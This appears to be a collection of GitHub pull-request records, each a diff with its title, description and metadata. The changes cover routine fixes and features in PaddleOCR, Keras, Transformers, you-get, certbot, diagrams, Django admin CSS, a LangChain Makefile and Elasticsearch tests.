diff --git a/test_tipc/configs/ch_PP-OCRv2_rec/train_infer_python.txt b/test_tipc/configs/ch_PP-OCRv2_rec/train_infer_python.txt index 375bd13ad6..4607b0a7f5 100644 --- a/test_tipc/configs/ch_PP-OCRv2_rec/train_infer_python.txt +++ b/test_tipc/configs/ch_PP-OCRv2_rec/train_infer_python.txt @@ -34,7 +34,7 @@ distill_export:null export1:null export2:null inference_dir:Student -infer_model:./inference/ch_PP-OCRv2_rec_infer/ +infer_model:./inference/ch_PP-OCRv2_rec_infer infer_export:null infer_quant:False inference:tools/infer/predict_rec.py @@ -45,7 +45,7 @@ inference:tools/infer/predict_rec.py --use_tensorrt:False|True --precision:fp32|fp16|int8 --rec_model_dir: ---image_dir:/inference/rec_inference +--image_dir:./inference/rec_inference null:null --benchmark:True null:null diff --git a/test_tipc/configs/ch_PP-OCRv2_rec_PACT/train_infer_python.txt b/test_tipc/configs/ch_PP-OCRv2_rec_PACT/train_infer_python.txt index 1d6198564e..6127896ae2 100644 --- a/test_tipc/configs/ch_PP-OCRv2_rec_PACT/train_infer_python.txt +++ b/test_tipc/configs/ch_PP-OCRv2_rec_PACT/train_infer_python.txt @@ -13,8 +13,8 @@ train_infer_img_dir:./inference/rec_inference null:null ## trainer:pact_train -norm_train:deploy/slim/quantization/quant.py -c test_tipc/configs/ch_PP-OCRv2_rec/ch_PP-OCRv2_rec_distillation.yml -o -pact_train:null +norm_train:null +pact_train:deploy/slim/quantization/quant.py -c test_tipc/configs/ch_PP-OCRv2_rec/ch_PP-OCRv2_rec_distillation.yml -o fpgm_train:null distill_train:null null:null @@ -27,14 +27,14 @@ null:null ===========================infer_params=========================== Global.save_inference_dir:./output/ Global.pretrained_model: -norm_export:deploy/slim/quantization/export_model.py -c test_tipc/configs/ch_PP-OCRv2_rec/ch_PP-OCRv2_rec_distillation.yml -o -quant_export: -fpgm_export: +norm_export:null +quant_export:deploy/slim/quantization/export_model.py -c test_tipc/configs/ch_PP-OCRv2_rec/ch_PP-OCRv2_rec_distillation.yml -o +fpgm_export: null distill_export:null export1:null export2:null inference_dir:Student -infer_model:./inference/ch_PP-OCRv2_rec_infer/ +infer_model:./inference/ch_PP-OCRv2_rec_infer infer_export:null infer_quant:True inference:tools/infer/predict_rec.py @@ -45,7 +45,7 @@ inference:tools/infer/predict_rec.py --use_tensorrt:False|True --precision:fp32|fp16|int8 --rec_model_dir: ---image_dir:/inference/rec_inference +--image_dir:./inference/rec_inference null:null --benchmark:True null:null diff --git a/test_tipc/configs/ch_ppocr_mobile_v2.0_det/train_infer_python.txt b/test_tipc/configs/ch_ppocr_mobile_v2.0_det/train_infer_python.txt index 977312f2a4..9a5dd76437 100644 --- a/test_tipc/configs/ch_ppocr_mobile_v2.0_det/train_infer_python.txt +++ b/test_tipc/configs/ch_ppocr_mobile_v2.0_det/train_infer_python.txt @@ -4,7 +4,7 @@ python:python3.7 gpu_list:0|0,1 Global.use_gpu:True|True Global.auto_cast:null -Global.epoch_num:lite_train_lite_infer=5|whole_train_whole_infer=300 +Global.epoch_num:lite_train_lite_infer=100|whole_train_whole_infer=300 Global.save_model_dir:./output/ Train.loader.batch_size_per_card:lite_train_lite_infer=2|whole_train_whole_infer=4 Global.pretrained_model:null diff --git a/test_tipc/configs/ch_ppocr_mobile_v2.0_rec_PACT/train_infer_python.txt b/test_tipc/configs/ch_ppocr_mobile_v2.0_rec_PACT/train_infer_python.txt index 7bbdd58ae1..56b9e1896c 100644 --- a/test_tipc/configs/ch_ppocr_mobile_v2.0_rec_PACT/train_infer_python.txt +++ b/test_tipc/configs/ch_ppocr_mobile_v2.0_rec_PACT/train_infer_python.txt @@ -28,7 +28,7 @@ null:null Global.save_inference_dir:./output/ Global.checkpoints: norm_export:null -quant_export:deploy/slim/quantization/export_model.py -ctest_tipc/configs/ch_ppocr_mobile_v2.0_rec_PACT/rec_chinese_lite_train_v2.0.yml -o +quant_export:deploy/slim/quantization/export_model.py -c test_tipc/configs/ch_ppocr_mobile_v2.0_rec_PACT/rec_chinese_lite_train_v2.0.yml -o fpgm_export:null distill_export:null export1:null diff --git a/test_tipc/prepare.sh b/test_tipc/prepare.sh index c384c05103..71d4010f4b 100644 --- a/test_tipc/prepare.sh +++ b/test_tipc/prepare.sh @@ -103,6 +103,8 @@ elif [ ${MODE} = "lite_train_whole_infer" ];then fi elif [ ${MODE} = "whole_infer" ];then wget -nc -P ./inference https://paddleocr.bj.bcebos.com/dygraph_v2.0/test/ch_det_data_50.tar --no-check-certificate + wget -nc -P ./inference/ https://paddleocr.bj.bcebos.com/dygraph_v2.0/test/rec_inference.tar --no-check-certificate + cd ./inference && tar xf rec_inference.tar && cd ../ if [ ${model_name} = "ch_ppocr_mobile_v2.0_det" ]; then eval_model_name="ch_ppocr_mobile_v2.0_det_train" rm -rf ./train_data/icdar2015 @@ -122,20 +124,31 @@ elif [ ${MODE} = "whole_infer" ];then cd ./inference && tar xf ch_ppocr_server_v2.0_det_infer.tar && tar xf ch_ppocr_server_v2.0_rec_infer.tar && tar xf ch_det_data_50.tar && cd ../ elif [ ${model_name} = "ch_ppocr_mobile_v2.0_rec" ]; then eval_model_name="ch_ppocr_mobile_v2.0_rec_infer" - wget -nc -P ./inference/ https://paddleocr.bj.bcebos.com/dygraph_v2.0/test/rec_inference.tar --no-check-certificate wget -nc -P ./inference https://paddleocr.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_mobile_v2.0_rec_infer.tar --no-check-certificate - cd ./inference && tar xf ${eval_model_name}.tar && tar xf rec_inference.tar && cd ../ + cd ./inference && tar xf ${eval_model_name}.tar && cd ../ elif [ ${model_name} = "ch_ppocr_server_v2.0_rec" ]; then eval_model_name="ch_ppocr_server_v2.0_rec_infer" - wget -nc -P ./inference/ https://paddleocr.bj.bcebos.com/dygraph_v2.0/test/rec_inference.tar --no-check-certificate wget -nc -P ./inference https://paddleocr.bj.bcebos.com/dygraph_v2.0/ch/ch_ppocr_server_v2.0_rec_infer.tar --no-check-certificate - cd ./inference && tar xf ${eval_model_name}.tar && tar xf rec_inference.tar && cd ../ + cd ./inference && tar xf ${eval_model_name}.tar && cd ../ + elif [ ${model_name} = "ch_ppocr_mobile_v2.0_rec_PACT" ]; then + eval_model_name="ch_PP-OCRv2_rec_slim_quant_train" + wget -nc -P ./inference https://paddleocr.bj.bcebos.com/PP-OCRv2/chinese/ch_PP-OCRv2_rec_slim_quant_train.tar --no-check-certificate + cd ./inference && tar xf ${eval_model_name}.tar && cd ../ + elif [ ${model_name} = "ch_ppocr_mobile_v2.0_rec_FPGM" ]; then + eval_model_name="ch_PP-OCRv2_rec_train" + wget -nc -P ./inference https://paddleocr.bj.bcebos.com/PP-OCRv2/chinese/ch_PP-OCRv2_rec_train.tar --no-check-certificate + cd ./inference && tar xf ${eval_model_name}.tar && cd ../ fi if [[ ${model_name} =~ "ch_PPOCRv2_det" ]]; then eval_model_name="ch_PP-OCRv2_det_infer" wget -nc -P ./inference/ https://paddleocr.bj.bcebos.com/PP-OCRv2/chinese/ch_PP-OCRv2_det_infer.tar --no-check-certificate cd ./inference && tar xf ${eval_model_name}.tar && tar xf ch_det_data_50.tar && cd ../ fi + if [[ ${model_name} =~ "PPOCRv2_ocr_rec" ]]; then + eval_model_name="ch_PP-OCRv2_rec_infer" + wget -nc -P ./inference/ https://paddleocr.bj.bcebos.com/PP-OCRv2/chinese/ch_PP-OCRv2_rec_infer.tar --no-check-certificate + cd ./inference && tar xf ${eval_model_name}.tar && cd ../ + fi if [ ${model_name} == "en_server_pgnetA" ]; then wget -nc -P ./inference/ https://paddleocr.bj.bcebos.com/dygraph_v2.0/pgnet/en_server_pgnetA.tar --no-check-certificate cd ./inference && tar xf en_server_pgnetA.tar && tar xf ch_det_data_50.tar && cd ../
fix some wrong data dir in `whole infer` mode
https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/4886
2021-12-10T07:34:09Z
2021-12-13T06:58:17Z
2021-12-13T06:58:17Z
2021-12-13T06:58:17Z
2,445
PaddlePaddle/PaddleOCR
42,656
Fix most of the issues with the CNTK backend's random functions mentioned in #10594
diff --git a/keras/backend/cntk_backend.py b/keras/backend/cntk_backend.py index a738b7ec16c..c12ad502088 100644 --- a/keras/backend/cntk_backend.py +++ b/keras/backend/cntk_backend.py @@ -369,27 +369,21 @@ def constant(value, dtype=None, shape=None, name=None): def random_binomial(shape, p=0.0, dtype=None, seed=None): - # use numpy workaround now if seed is None: # ensure that randomness is conditioned by the Numpy RNG seed = np.random.randint(10e7) - np.random.seed(seed) if dtype is None: dtype = np.float32 else: dtype = _convert_string_dtype(dtype) - size = 1 for _ in shape: if _ is None: raise ValueError('CNTK Backend: randomness op with ' 'dynamic shape is not supported now. ' 'Please provide fixed dimension ' 'instead of `None`.') - size *= _ - - binomial = np.random.binomial(1, p, size).astype(dtype).reshape(shape) - return variable(value=binomial, dtype=dtype) + return C.random.bernoulli(shape=shape, dtype=dtype, mean=p, seed=seed) def random_uniform(shape, minval=0.0, maxval=1.0, dtype=None, seed=None): @@ -400,7 +394,10 @@ def random_uniform(shape, minval=0.0, maxval=1.0, dtype=None, seed=None): 'Please provide fixed dimension ' 'instead of `None`.') - return random_uniform_variable(shape, minval, maxval, dtype, seed) + if seed is None: + # ensure that randomness is conditioned by the Numpy RNG + seed = np.random.randint(10e3) + return C.random.uniform(shape=shape, dtype=dtype, low=minval, high=maxval, seed=seed) def random_uniform_variable(shape, low, high, @@ -450,13 +447,14 @@ def random_normal_variable( if name is None: name = '' - return C.parameter( + p = C.parameter( shape=shape, init=C.initializer.normal( scale=scale, seed=seed), dtype=dtype, name=name) + return variable(value=p.value + mean) def random_normal(shape, mean=0.0, stddev=1.0, dtype=None, seed=None): @@ -468,8 +466,10 @@ def random_normal(shape, mean=0.0, stddev=1.0, dtype=None, seed=None): 'dynamic shape is not supported now. ' 'Please provide fixed dimension ' 'instead of `None`.') - # how to apply mean and stddev - return random_normal_variable(shape=shape, mean=mean, scale=1.0, seed=seed) + if seed is None: + # ensure that randomness is conditioned by the Numpy RNG + seed = np.random.randint(10e3) + return C.random.normal(shape=shape, mean=mean, scale=stddev, seed=seed, dtype=dtype) def truncated_normal(shape, mean=0.0, stddev=1.0, dtype=None, seed=None): diff --git a/tests/keras/backend/backend_test.py b/tests/keras/backend/backend_test.py index 3ad37f5bf2a..ed049d10827 100644 --- a/tests/keras/backend/backend_test.py +++ b/tests/keras/backend/backend_test.py @@ -1162,13 +1162,19 @@ def legacy_test_pool3d(self): strides=(1, 1, 1), padding='same', pool_mode='avg') def test_random_normal(self): - mean = 0. - std = 1. + # test standard normal as well as a normal with a different set of parameters for k in BACKENDS: - rand = k.eval(k.random_normal((300, 200), mean=mean, stddev=std, seed=1337)) - assert rand.shape == (300, 200) - assert np.abs(np.mean(rand) - mean) < 0.015 - assert np.abs(np.std(rand) - std) < 0.015 + for mean, std in [(0., 1.), (-10., 5.)]: + rand = k.eval(k.random_normal((300, 200), mean=mean, stddev=std, seed=1337)) + assert rand.shape == (300, 200) + assert np.abs(np.mean(rand) - mean) < std * 0.015 + assert np.abs(np.std(rand) - std) < std * 0.015 + + # test that random_normal also generates different values when used within a function + r = k.random_normal((1,), mean=mean, stddev=std, seed=1337) + samples = [k.eval(r) for _ in range(60000)] + assert np.abs(np.mean(samples) - mean) < std * 0.015 + assert np.abs(np.std(samples) - std) < std * 0.015 def test_random_uniform(self): min_val = -1. @@ -1177,8 +1183,14 @@ def test_random_uniform(self): rand = k.eval(k.random_uniform((200, 100), min_val, max_val)) assert rand.shape == (200, 100) assert np.abs(np.mean(rand)) < 0.015 - assert np.max(rand) <= max_val - assert np.min(rand) >= min_val + assert max_val - 0.015 < np.max(rand) <= max_val + assert min_val + 0.015 > np.min(rand) >= min_val + + r = k.random_uniform((1,), minval=min_val, maxval=max_val) + samples = [k.eval(r) for _ in range(20000)] + assert np.abs(np.mean(samples)) < 0.015 + assert max_val - 0.015 < np.max(samples) <= max_val + assert min_val + 0.015 > np.min(samples) >= min_val def test_random_binomial(self): p = 0.5 @@ -1189,6 +1201,12 @@ def test_random_binomial(self): assert np.max(rand) == 1 assert np.min(rand) == 0 + r = k.random_binomial((1,), p) + samples = [k.eval(r) for _ in range(20000)] + assert np.abs(np.mean(samples) - p) < 0.015 + assert np.max(samples) == 1 + assert np.min(samples) == 0 + def test_truncated_normal(self): mean = 0. std = 1.
This addresses all of the issues in #10594 except for the problem with `truncated_normal`.
https://api.github.com/repos/keras-team/keras/pulls/10595
2018-07-03T19:56:18Z
2018-07-07T07:25:05Z
2018-07-07T07:25:05Z
2018-07-07T07:25:05Z
1,546
keras-team/keras
47,905
CLI: Properly detect encoder-decoder models
diff --git a/src/transformers/commands/pt_to_tf.py b/src/transformers/commands/pt_to_tf.py index 7bc5333b109e3..bd599de4f6994 100644 --- a/src/transformers/commands/pt_to_tf.py +++ b/src/transformers/commands/pt_to_tf.py @@ -207,7 +207,7 @@ def run(self): tf_from_pt_model = tf_class.from_pretrained(self._local_dir, from_pt=True) # Extra input requirements, in addition to the input modality - if hasattr(pt_model, "encoder") and hasattr(pt_model, "decoder"): + if config.is_encoder_decoder or (hasattr(pt_model, "encoder") and hasattr(pt_model, "decoder")): decoder_input_ids = np.asarray([[1], [1]], dtype=int) * pt_model.config.decoder_start_token_id pt_input.update({"decoder_input_ids": torch.tensor(decoder_input_ids)}) tf_input.update({"decoder_input_ids": tf.convert_to_tensor(decoder_input_ids)})
# What does this PR do? Micro-PR that does what the title says. Some models have the encoder-decoder structure nested, and we now have access to the config file.
https://api.github.com/repos/huggingface/transformers/pulls/17605
2022-06-08T12:18:58Z
2022-06-08T15:16:00Z
2022-06-08T15:16:00Z
2022-06-08T15:25:18Z
231
huggingface/transformers
12,377
Add support for VK
diff --git a/README.md b/README.md index 996d8390e5..5aac180ad2 100644 --- a/README.md +++ b/README.md @@ -60,6 +60,7 @@ __中文说明__已移至[wiki](https://github.com/soimort/you-get/wiki/%E4%B8%A * Baidu Wangpan (百度网盘) <http://pan.baidu.com> * SongTaste <http://www.songtaste.com> * Alive.in.th <http://alive.in.th> +* VK <http://vk.com> ## Dependencies diff --git a/README.txt b/README.txt index a2f17c2d1a..c4275cad77 100644 --- a/README.txt +++ b/README.txt @@ -63,6 +63,7 @@ Supported Sites (As of Now) * Baidu Wangpan (百度网盘) http://pan.baidu.com * SongTaste http://www.songtaste.com * Alive.in.th http://alive.in.th +* VK http://vk.com Dependencies ------------ diff --git a/src/you_get/extractor/__init__.py b/src/you_get/extractor/__init__.py index 5f084d4d78..018cf07214 100644 --- a/src/you_get/extractor/__init__.py +++ b/src/you_get/extractor/__init__.py @@ -37,6 +37,7 @@ from .vid48 import * from .vimeo import * from .vine import * +from .vk import * from .w56 import * from .xiami import * from .yinyuetai import * diff --git a/src/you_get/extractor/__main__.py b/src/you_get/extractor/__main__.py index 744a064666..0cb5fe93f3 100644 --- a/src/you_get/extractor/__main__.py +++ b/src/you_get/extractor/__main__.py @@ -58,6 +58,7 @@ def url_to_module(url): 'vid48': vid48, 'vimeo': vimeo, 'vine': vine, + 'vk': vk, 'xiami': xiami, 'yinyuetai': yinyuetai, 'youku': youku, diff --git a/src/you_get/extractor/vk.py b/src/you_get/extractor/vk.py new file mode 100644 index 0000000000..6bb8b39a9e --- /dev/null +++ b/src/you_get/extractor/vk.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +__all__ = ['vk_download'] + +from ..common import * + +def vk_download(url, output_dir='.', merge=True, info_only=False): + video_page = get_content(url) + title = unescape_html(r1(r'"title":"([^"]+)"', video_page)) + info = dict(re.findall(r'\\"url(\d+)\\":\\"([^"]+)\\"', video_page)) + for quality in ['1080', '720', '480', '360', '240']: + if quality in info: + url = re.sub(r'\\\\\\/', r'/', info[quality]) + break + assert url + + type, ext, size = url_info(url) + + print_info(site_info, title, type, size) + if not info_only: + download_urls([url], title, ext, size, output_dir, merge=merge) + +site_info = "VK.com" +download = vk_download +download_playlist = playlist_not_supported('vk')
**VK** (https://vk.com) is the largest European social network with more than a 100 million active users. Test links: - http://vk.com/video-6318641_167337138
https://api.github.com/repos/soimort/you-get/pulls/300
2014-02-18T20:18:10Z
2014-02-18T20:21:17Z
2014-02-18T20:21:17Z
2014-06-23T19:14:58Z
834
soimort/you-get
21,374
Fix minor certbot-auto verbosity issue
diff --git a/letsencrypt-auto-source/letsencrypt-auto b/letsencrypt-auto-source/letsencrypt-auto index db01277dc41..50c80f0a4d0 100755 --- a/letsencrypt-auto-source/letsencrypt-auto +++ b/letsencrypt-auto-source/letsencrypt-auto @@ -1069,8 +1069,8 @@ UNLIKELY_EOF fi if [ -n "$SUDO" ]; then # SUDO is su wrapper or sudo - echo "Requesting root privileges to run certbot..." - echo " $VENV_BIN/letsencrypt" "$@" + say "Requesting root privileges to run certbot..." + say " $VENV_BIN/letsencrypt" "$@" fi if [ -z "$SUDO_ENV" ] ; then # SUDO is su wrapper / noop diff --git a/letsencrypt-auto-source/letsencrypt-auto.template b/letsencrypt-auto-source/letsencrypt-auto.template index 566f7930731..f6585a37881 100755 --- a/letsencrypt-auto-source/letsencrypt-auto.template +++ b/letsencrypt-auto-source/letsencrypt-auto.template @@ -368,8 +368,8 @@ UNLIKELY_EOF fi if [ -n "$SUDO" ]; then # SUDO is su wrapper or sudo - echo "Requesting root privileges to run certbot..." - echo " $VENV_BIN/letsencrypt" "$@" + say "Requesting root privileges to run certbot..." + say " $VENV_BIN/letsencrypt" "$@" fi if [ -z "$SUDO_ENV" ] ; then # SUDO is su wrapper / noop
[My comment](https://github.com/certbot/certbot/pull/4292#discussion_r112085601) on #4292 caused this. These lines were previously conditional on `if [ "$QUIET" = 1 ]` and my comment caused this behavior to be removed. This PR just fixes that rather than having the PR author have to change things back due to my mistake.
https://api.github.com/repos/certbot/certbot/pulls/4530
2017-04-19T16:23:02Z
2017-04-19T21:11:19Z
2017-04-19T21:11:19Z
2017-04-19T21:11:21Z
385
certbot/certbot
3,641
Add: container runtimes
diff --git a/diagrams/onprem/container.py b/diagrams/onprem/container.py index de0494215..b60e4ac83 100644 --- a/diagrams/onprem/container.py +++ b/diagrams/onprem/container.py @@ -8,10 +8,26 @@ class _Container(_OnPrem): _icon_dir = "resources/onprem/container" +class Containerd(_Container): + _icon = "containerd.png" + + +class Crio(_Container): + _icon = "crio.png" + + class Docker(_Container): _icon = "docker.png" +class Firecracker(_Container): + _icon = "firecracker.png" + + +class Gvisor(_Container): + _icon = "gvisor.png" + + class Lxc(_Container): _icon = "lxc.png" diff --git a/docs/nodes/onprem.md b/docs/nodes/onprem.md index a519be55e..03c083f8d 100644 --- a/docs/nodes/onprem.md +++ b/docs/nodes/onprem.md @@ -55,7 +55,11 @@ Node classes list of onprem provider. ## onprem.container +- **diagrams.onprem.container.Containerd** +- **diagrams.onprem.container.Crio** - **diagrams.onprem.container.Docker** +- **diagrams.onprem.container.Firecracker** +- **diagrams.onprem.container.Gvisor** - **diagrams.onprem.container.Lxc**, **LXC** (alias) - **diagrams.onprem.container.Rkt**, **RKT** (alias) diff --git a/resources/onprem/container/containerd.png b/resources/onprem/container/containerd.png new file mode 100644 index 000000000..40032b6d3 Binary files /dev/null and b/resources/onprem/container/containerd.png differ diff --git a/resources/onprem/container/crio.png b/resources/onprem/container/crio.png new file mode 100644 index 000000000..dab25ba13 Binary files /dev/null and b/resources/onprem/container/crio.png differ diff --git a/resources/onprem/container/firecracker.png b/resources/onprem/container/firecracker.png new file mode 100644 index 000000000..522ffa3e2 Binary files /dev/null and b/resources/onprem/container/firecracker.png differ diff --git a/resources/onprem/container/gvisor.png b/resources/onprem/container/gvisor.png new file mode 100644 index 000000000..258ce7a1c Binary files /dev/null and b/resources/onprem/container/gvisor.png differ
For: - https://containerd.io/ - https://cri-o.io/ - https://gvisor.dev/ - https://firecracker-microvm.github.io/
https://api.github.com/repos/mingrammer/diagrams/pulls/300
2020-09-27T16:06:12Z
2020-10-24T14:10:45Z
2020-10-24T14:10:45Z
2020-10-24T14:10:45Z
615
mingrammer/diagrams
52,597
Used CSS flex for form rows.
diff --git a/django/contrib/admin/static/admin/css/forms.css b/django/contrib/admin/static/admin/css/forms.css index a326b3baf7c3f..d932556ade7b3 100644 --- a/django/contrib/admin/static/admin/css/forms.css +++ b/django/contrib/admin/static/admin/css/forms.css @@ -22,6 +22,11 @@ form .form-row p { padding-left: 0; } +.form-row > div { + display: flex; + flex-wrap: wrap; +} + /* FORM LABELS */ label { @@ -69,7 +74,6 @@ form ul.inline li { .aligned label { display: block; padding: 4px 10px 0 0; - float: left; width: 160px; word-wrap: break-word; line-height: 1; @@ -82,7 +86,7 @@ form ul.inline li { height: 26px; } -.aligned label + p, .aligned label + div.help, .aligned label + div.readonly { +.aligned label + p, .aligned .checkbox-row + div.help, .aligned label + div.readonly { padding: 6px 0; margin-top: 0; margin-bottom: 0; @@ -90,6 +94,11 @@ form ul.inline li { overflow-wrap: break-word; } +.aligned label + div.readonly, +.aligned label + .datetime { + margin-left: 0; +} + .aligned ul label { display: inline; float: none; @@ -117,7 +126,6 @@ form .aligned div.radiolist { form .aligned p.help, form .aligned div.help { - clear: left; margin-top: 0; margin-left: 160px; padding-left: 10px; @@ -129,8 +137,7 @@ form .aligned p.datetime div.help.timezonewarning { font-weight: normal; } -form .aligned label + p.help, -form .aligned label + div.help { +form .aligned .checkbox-row + .help { margin-left: 0; padding-left: 0; } diff --git a/django/contrib/admin/static/admin/css/rtl.css b/django/contrib/admin/static/admin/css/rtl.css index 014fd1e591194..9e9cffe31af5b 100644 --- a/django/contrib/admin/static/admin/css/rtl.css +++ b/django/contrib/admin/static/admin/css/rtl.css @@ -111,7 +111,6 @@ thead th.sorted .text { .aligned label { padding: 0 0 3px 1em; - float: right; } .submit-row a.deletelink { @@ -127,10 +126,6 @@ thead th.sorted .text { margin-left: 5px; } -form .aligned p.help, form .aligned div.help { - clear: right; -} - form .aligned ul { margin-right: 163px; margin-left: 0; @@ -142,6 +137,17 @@ form ul.inline li { padding-left: 7px; } +form .aligned p.help, +form .aligned div.help { + margin-right: 160px; + padding-right: 10px; +} + +form .aligned .checkbox-row + .help { + margin-right: 0; + padding-right: 0; +} + .submit-row { text-align: right; } diff --git a/django/contrib/admin/templates/admin/includes/fieldset.html b/django/contrib/admin/templates/admin/includes/fieldset.html index ba260a36ce68f..7b6e903ec319d 100644 --- a/django/contrib/admin/templates/admin/includes/fieldset.html +++ b/django/contrib/admin/templates/admin/includes/fieldset.html @@ -19,12 +19,12 @@ {{ field.field }} {% endif %} {% endif %} - {% if field.field.help_text %} - <div class="help"{% if field.field.id_for_label %} id="{{ field.field.id_for_label }}_helptext"{% endif %}> - {{ field.field.help_text|safe }} - </div> - {% endif %} </div> + {% if field.field.help_text %} + <div class="help"{% if field.field.id_for_label %} id="{{ field.field.id_for_label }}_helptext"{% endif %}> + {{ field.field.help_text|safe }} + </div> + {% endif %} {% endfor %} </div> {% endfor %}
The original idea was just to change the form rows to CSS flex, but on doing that I realised the original (before this patch) RTL pages looked wrong, when using flex this was fixed, so I added a bit into the RTL sheet to align things in the same way we do for LTR. I'm not an RTL expert, it's possible it was this way intentionally, I am not sure. See screens. It also could be this PR is fixing two issues, but I don't see a clean way to do them separately. Before (LTR): <img width="1061" alt="Screenshot 2022-10-09 at 12 43 05" src="https://user-images.githubusercontent.com/3871354/194752937-1d7a3e4d-1315-4fe1-84bf-6d20dea0a8a7.png"> After (LTR): <img width="1111" alt="Screenshot 2022-10-09 at 12 50 19" src="https://user-images.githubusercontent.com/3871354/194752946-2aa3d756-9bee-4fe5-9f5a-fb1da2e79907.png"> Before (RTL, note labels on the left): <img width="1375" alt="Screenshot 2022-10-09 at 12 43 32" src="https://user-images.githubusercontent.com/3871354/194752955-0c3995cb-12e6-492c-a910-5556c0023dc3.png"> After (RTL, note labels on the right and help text aligned): <img width="1026" alt="Screenshot 2022-10-09 at 12 50 47" src="https://user-images.githubusercontent.com/3871354/194752983-e7e4ca0e-2523-4024-8f66-0dd4c06019ae.png">
https://api.github.com/repos/django/django/pulls/16161
2022-10-09T10:58:26Z
2022-11-22T08:17:33Z
2022-11-22T08:17:32Z
2023-03-28T23:59:14Z
1,028
django/django
51,241
allow users to choose how many config changes are shown
diff --git a/letsencrypt/cli.py b/letsencrypt/cli.py index 855c7a467c5..0422a8c6c4b 100644 --- a/letsencrypt/cli.py +++ b/letsencrypt/cli.py @@ -1059,7 +1059,7 @@ def config_changes(config, unused_plugins): View checkpoints and associated configuration changes. """ - client.view_config_changes(config) + client.view_config_changes(config, num=config.num) def plugins_cmd(config, plugins): # TODO: Use IDisplay rather than print @@ -1633,6 +1633,10 @@ def _create_subparsers(helpful): helpful.add_group("revoke", description="Options for revocation of certs") helpful.add_group("rollback", description="Options for reverting config changes") helpful.add_group("plugins", description="Plugin options") + helpful.add_group("config_changes", + description="Options for showing a history of config changes") + helpful.add("config_changes", "--num", type=int, + help="How many past revisions you want to be displayed") helpful.add( None, "--user-agent", default=None, help="Set a custom user agent string for the client. User agent strings allow " diff --git a/letsencrypt/client.py b/letsencrypt/client.py index 9dfa70e8d9f..149fdbbe9ce 100644 --- a/letsencrypt/client.py +++ b/letsencrypt/client.py @@ -543,7 +543,7 @@ def rollback(default_installer, checkpoints, config, plugins): installer.restart() -def view_config_changes(config): +def view_config_changes(config, num=None): """View checkpoints and associated configuration changes. .. note:: This assumes that the installation is using a Reverter object. @@ -554,7 +554,7 @@ def view_config_changes(config): """ rev = reverter.Reverter(config) rev.recovery_routine() - rev.view_config_changes() + rev.view_config_changes(num) def _save_chain(chain_pem, chain_path): diff --git a/letsencrypt/reverter.py b/letsencrypt/reverter.py index 863074374ce..ea54a91ee22 100644 --- a/letsencrypt/reverter.py +++ b/letsencrypt/reverter.py @@ -94,7 +94,7 @@ def rollback_checkpoints(self, rollback=1): "Unable to load checkpoint during rollback") rollback -= 1 - def view_config_changes(self, for_logging=False): + def view_config_changes(self, for_logging=False, num=None): """Displays all saved checkpoints. All checkpoints are printed by @@ -107,7 +107,8 @@ def view_config_changes(self, for_logging=False): """ backups = os.listdir(self.config.backup_dir) backups.sort(reverse=True) - + if num: + backups = backups[:num] if not backups: logger.info("The Let's Encrypt client has not saved any backups " "of your configuration")
refers to #2497 now you can pass in a number on the command line which will limit the number of config changes shown
https://api.github.com/repos/certbot/certbot/pulls/2498
2016-02-18T02:35:56Z
2016-03-12T02:07:07Z
2016-03-12T02:07:07Z
2016-05-06T19:22:01Z
663
certbot/certbot
643
fix makefile help
diff --git a/Makefile b/Makefile index 5214f2fa1cbc90..64ed1a29efdf72 100644 --- a/Makefile +++ b/Makefile @@ -43,7 +43,12 @@ spell_fix: help: @echo '----' - @echo 'coverage - run unit tests and generate coverage report' + @echo 'clean - run docs_clean and api_docs_clean' @echo 'docs_build - build the documentation' @echo 'docs_clean - clean the documentation build artifacts' @echo 'docs_linkcheck - run linkchecker on the documentation' + @echo 'api_docs_build - build the API Reference documentation' + @echo 'api_docs_clean - clean the API Reference documentation build artifacts' + @echo 'api_docs_linkcheck - run linkchecker on the API Reference documentation' + @echo 'spell_check - run codespell on the project' + @echo 'spell_fix - run codespell on the project and fix the errors' \ No newline at end of file diff --git a/libs/langchain/Makefile b/libs/langchain/Makefile index ba27b07f37690b..db4b8c089b893a 100644 --- a/libs/langchain/Makefile +++ b/libs/langchain/Makefile @@ -92,15 +92,24 @@ spell_fix: ###################### help: - @echo '----' - @echo 'coverage - run unit tests and generate coverage report' + @echo '====================' + @echo '-- DOCUMENTATION --' + @echo 'clean - run docs_clean and api_docs_clean' @echo 'docs_build - build the documentation' @echo 'docs_clean - clean the documentation build artifacts' @echo 'docs_linkcheck - run linkchecker on the documentation' + @echo 'api_docs_build - build the API Reference documentation' + @echo 'api_docs_clean - clean the API Reference documentation build artifacts' + @echo 'api_docs_linkcheck - run linkchecker on the API Reference documentation' + @echo '-- LINTING --' @echo 'format - run code formatters' @echo 'lint - run linters' + @echo 'spell_check - run codespell on the project' + @echo 'spell_fix - run codespell on the project and fix the errors' + @echo '-- TESTS --' + @echo 'coverage - run unit tests and generate coverage report' @echo 'test - run unit tests' - @echo 'tests - run unit tests' + @echo 'tests - run unit tests (alias for "make test")' @echo 'test TEST_FILE=<test_file> - run all tests in file' @echo 'extended_tests - run only extended unit tests' @echo 'test_watch - run unit tests in watch mode'
Fixed the `makefile` help. It was not up-to-date. @baskaryan
https://api.github.com/repos/langchain-ai/langchain/pulls/8723
2023-08-03T22:38:57Z
2023-08-04T19:37:01Z
2023-08-04T19:37:01Z
2023-08-04T20:05:28Z
674
langchain-ai/langchain
43,392
elasticsearch[patch]: fix integration tests for release
diff --git a/libs/partners/elasticsearch/tests/integration_tests/test_retrievers.py b/libs/partners/elasticsearch/tests/integration_tests/test_retrievers.py index 79f9d8ef1d511a..59c02449b25970 100644 --- a/libs/partners/elasticsearch/tests/integration_tests/test_retrievers.py +++ b/libs/partners/elasticsearch/tests/integration_tests/test_retrievers.py @@ -1,5 +1,6 @@ """Test ElasticsearchRetriever functionality.""" +import os import re import uuid from typing import Any, Dict @@ -77,11 +78,19 @@ def test_init_url(self, index_name: str) -> None: def body_func(query: str) -> Dict: return {"query": {"match": {text_field: {"query": query}}}} + es_url = os.environ.get("ES_URL", "http://localhost:9200") + cloud_id = os.environ.get("ES_CLOUD_ID") + api_key = os.environ.get("ES_API_KEY") + + config = ( + {"cloud_id": cloud_id, "api_key": api_key} if cloud_id else {"url": es_url} + ) + retriever = ElasticsearchRetriever.from_es_params( - url="http://localhost:9200", index_name=index_name, body_func=body_func, content_field=text_field, + **config, # type: ignore[arg-type] ) index_test_data(retriever.es_client, index_name, text_field)
